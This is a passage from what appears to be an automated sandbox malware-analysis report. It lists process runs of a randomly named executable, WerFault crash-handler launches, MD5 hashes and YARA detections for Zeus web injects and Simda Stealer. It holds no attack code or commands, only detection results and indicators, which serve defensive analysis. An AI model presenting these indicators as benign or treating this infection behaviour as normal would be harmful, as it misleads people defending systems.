                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2612530811.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2544138671.000000000D580000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2775654849.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2587965689.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                  Start time:12:51:00
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2605884801.00000000011E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2605946728.0000000001240000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                  Start time:12:51:00
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000007.00000002.2632861320.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000007.00000002.2635595118.0000000001040000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                  Start time:12:51:00
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000009.00000002.2610626005.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000009.00000002.2610520727.00000000009C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                  Start time:12:51:01
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000B.00000002.2649599507.0000000003270000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000B.00000002.2639594297.0000000002EA0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                  Start time:12:51:01
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 904
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                  Start time:12:51:01
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 884
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                  Start time:12:51:01
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 980
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                  Start time:12:51:03
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.2611939403.0000000002AF0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.2612614586.0000000002B80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                  Start time:12:51:04
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 2076
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                  Start time:12:51:06
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2647909784.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2639288300.00000000011D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                  Start time:12:51:07
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2694402665.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2699555610.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                  Start time:12:51:09
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 968
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                  Start time:12:51:10
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.2707315071.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.2705436372.00000000024F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                  Start time:12:51:10
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 1008
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                  Start time:12:51:12
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2725518370.0000000002E80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2728043702.0000000003040000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                  Start time:12:51:12
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 832
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                  Start time:12:51:14
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001E.00000002.2759598984.00000000025F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001E.00000002.2785000519.00000000027A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                  Start time:12:51:15
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1008
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                  Start time:12:51:16
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2737098756.0000000002670000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2735290502.0000000000B00000.00000040.00000010.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                  Start time:12:51:18
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 1244
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                  Start time:12:51:19
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.2844886273.0000000001550000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.2845868580.00000000015B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                  Start time:12:51:20
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 908
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                  Start time:12:51:21
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
